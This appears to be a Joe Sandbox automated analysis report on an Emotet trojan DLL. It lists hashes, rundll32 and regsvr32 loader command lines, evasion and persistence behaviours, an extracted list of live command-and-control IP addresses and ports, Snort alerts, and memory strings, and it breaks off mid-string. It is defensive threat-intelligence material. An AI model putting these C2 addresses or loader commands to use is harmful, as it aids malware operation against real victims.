Edit tour

Windows Analysis Report
FC6cLk6kKz

Overview

General Information

Sample Name:	FC6cLk6kKz (renamed file extension from none to dll)
Analysis ID:	631731
MD5:	4d859466611b663b26b8f88b6c6b396e
SHA1:	cf04bea97bdd034deaecc4d666e0b6c572e15181
SHA256:	dbdbe1e46d20b345284721de5f11990137ecc40770e369768634ef1f52d9e7bb
Tags:	32dllexetrojan
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Changes security center settings (notifications, updates, antivirus, firewall)

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

Modifies existing windows services

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1212 cmdline: loaddll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6064 cmdline: rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 1460 cmdline: regsvr32.exe /s C:\Users\user\Desktop\FC6cLk6kKz.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 2344 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf" MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 3340 cmdline: rundll32.exe C:\Users\user\Desktop\FC6cLk6kKz.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 1016 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5140 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3264 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 4832 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5248 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5612 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 5780 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1236 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4624 cmdline: c:\windows\system32\svchost.exe -k localservice -s W32Time MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["70.36.102.35:443", "92.240.254.110:8080", "51.91.76.89:8080", "217.182.25.250:8080", "119.193.124.41:7080", "45.142.114.231:8080", "176.56.128.118:443", "51.254.140.238:7080", "173.212.193.249:8080", "131.100.24.231:80", "188.44.20.25:443", "1.234.2.232:8080", "153.126.146.25:7080", "51.91.7.5:8080", "151.106.112.196:8080", "46.55.222.11:443", "107.182.225.142:8080", "82.165.152.127:8080", "212.237.17.99:8080", "195.201.151.129:8080", "197.242.150.244:8080", "103.43.46.182:443", "206.188.212.92:8080", "196.218.30.83:443", "5.9.116.246:8080", "185.157.82.211:8080", "176.104.106.96:8080", "159.65.88.10:8080", "212.24.98.99:8080", "209.250.246.206:443", "45.118.135.203:7080", "50.116.54.215:443", "178.79.147.66:8080", "72.15.201.15:8080", "101.50.0.91:8080", "103.75.201.2:443", "31.24.158.56:8080", "146.59.226.45:443", "110.232.117.186:8080", "138.185.72.26:8080", "45.176.232.124:443", "189.126.111.200:7080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "209.126.98.206:8080", "58.227.42.236:80", "203.114.109.124:443", "195.154.133.20:443", "192.99.251.50:443", "1.234.21.73:7080", "50.30.40.196:8080", "216.158.226.206:443", "185.8.212.130:7080", "159.8.59.82:8080", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.14c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.14c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2930000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2930000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2930000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2930000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3130000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3130000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4820000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4820000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3160000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3160000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.2fa0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.2fa0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4820000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4820000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2960000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2960000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4850000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4850000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3130000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.3130000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4cd0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4cd0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ca0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ca0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.14c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.14c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ca0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ca0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 25 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 19 - Source IP: 192.168.2.4 - Destination IP: 51.91.76.89

Timestamp:	192.168.2.451.91.76.894977280802404336 05/22/22-04:19:01.586576
SID:	2404336
Source Port:	49772
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 3.2.rundll32.exe.4850000.1.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["70.36.102.35:443", "92.240.254.110:8080", "51.91.76.89:8080", "217.182.25.250:8080", "119.193.124.41:7080", "45.142.114.231:8080", "176.56.128.118:443", "51.254.140.238:7080", "173.212.193.249:8080", "131.100.24.231:80", "188.44.20.25:443", "1.234.2.232:8080", "153.126.146.25:7080", "51.91.7.5:8080", "151.106.112.196:8080", "46.55.222.11:443", "107.182.225.142:8080", "82.165.152.127:8080", "212.237.17.99:8080", "195.201.151.129:8080", "197.242.150.244:8080", "103.43.46.182:443", "206.188.212.92:8080", "196.218.30.83:443", "5.9.116.246:8080", "185.157.82.211:8080", "176.104.106.96:8080", "159.65.88.10:8080", "212.24.98.99:8080", "209.250.246.206:443", "45.118.135.203:7080", "50.116.54.215:443", "178.79.147.66:8080", "72.15.201.15:8080", "101.50.0.91:8080", "103.75.201.2:443", "31.24.158.56:8080", "146.59.226.45:443", "110.232.117.186:8080", "138.185.72.26:8080", "45.176.232.124:443", "189.126.111.200:7080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "209.126.98.206:8080", "58.227.42.236:80", "203.114.109.124:443", "195.154.133.20:443", "192.99.251.50:443", "1.234.21.73:7080", "50.30.40.196:8080", "216.158.226.206:443", "185.8.212.130:7080", "159.8.59.82:8080", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Source: FC6cLk6kKz.dll	Virustotal: Detection: 64%			Perma Link
Source: FC6cLk6kKz.dll	ReversingLabs: Detection: 67%

Antivirus / Scanner detection for submitted sample

Source: FC6cLk6kKz.dll

Avira: detected

Antivirus detection for URL or domain

Source: https://51.91.76.89:8080/XmBjfLdyjiONnyuk	Avira URL Cloud: Label: malware
Source: https://70.36.102.35/	Avira URL Cloud: Label: malware
Source: https://51.91.76.89:8080/XmBjfLdyjiONnyu7	Avira URL Cloud: Label: malware
Source: https://51.91.76.89:8080/XmBjfLdyjiONnyu	Avira URL Cloud: Label: malware
Source: https://70.36.102.35/P	Avira URL Cloud: Label: malware
Source: https://51.91.76.89/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: https://70.36.102.35/

Virustotal: Detection: 13%

Perma Link

Source: FC6cLk6kKz.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	0_2_10011C86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	2_2_10011C86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	3_2_10011C86

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 70.36.102.35 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Domain query: time.windows.com
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 92.240.254.110 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49772 -> 51.91.76.89:8080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 70.36.102.35:443
Source: Malware configuration extractor	IPs: 92.240.254.110:8080
Source: Malware configuration extractor	IPs: 51.91.76.89:8080
Source: Malware configuration extractor	IPs: 217.182.25.250:8080
Source: Malware configuration extractor	IPs: 119.193.124.41:7080
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 176.56.128.118:443
Source: Malware configuration extractor	IPs: 51.254.140.238:7080
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 131.100.24.231:80
Source: Malware configuration extractor	IPs: 188.44.20.25:443
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 153.126.146.25:7080
Source: Malware configuration extractor	IPs: 51.91.7.5:8080
Source: Malware configuration extractor	IPs: 151.106.112.196:8080
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 82.165.152.127:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 195.201.151.129:8080
Source: Malware configuration extractor	IPs: 197.242.150.244:8080
Source: Malware configuration extractor	IPs: 103.43.46.182:443
Source: Malware configuration extractor	IPs: 206.188.212.92:8080
Source: Malware configuration extractor	IPs: 196.218.30.83:443
Source: Malware configuration extractor	IPs: 5.9.116.246:8080
Source: Malware configuration extractor	IPs: 185.157.82.211:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 209.250.246.206:443
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 101.50.0.91:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 31.24.158.56:8080
Source: Malware configuration extractor	IPs: 146.59.226.45:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 189.126.111.200:7080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 209.126.98.206:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 192.99.251.50:443
Source: Malware configuration extractor	IPs: 1.234.21.73:7080
Source: Malware configuration extractor	IPs: 50.30.40.196:8080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 185.8.212.130:7080
Source: Malware configuration extractor	IPs: 159.8.59.82:8080
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 167.99.115.35:8080
Source: Malware configuration extractor	IPs: 79.172.212.216:8080

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: Joe Sandbox View	IP Address: 217.182.25.250 217.182.25.250
Source: Joe Sandbox View	IP Address: 151.106.112.196 151.106.112.196

Source: global traffic	TCP traffic: 192.168.2.4:49763 -> 92.240.254.110:8080
Source: global traffic	TCP traffic: 192.168.2.4:49772 -> 51.91.76.89:8080

Source: unknown

Network traffic detected: IP country count 28

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 51.91.76.89

Source: svchost.exe, 0000001B.00000003.448143031.00000186AF96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001B.00000003.448143031.00000186AF96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001B.00000003.448167957.00000186AF97E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.448143031.00000186AF96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 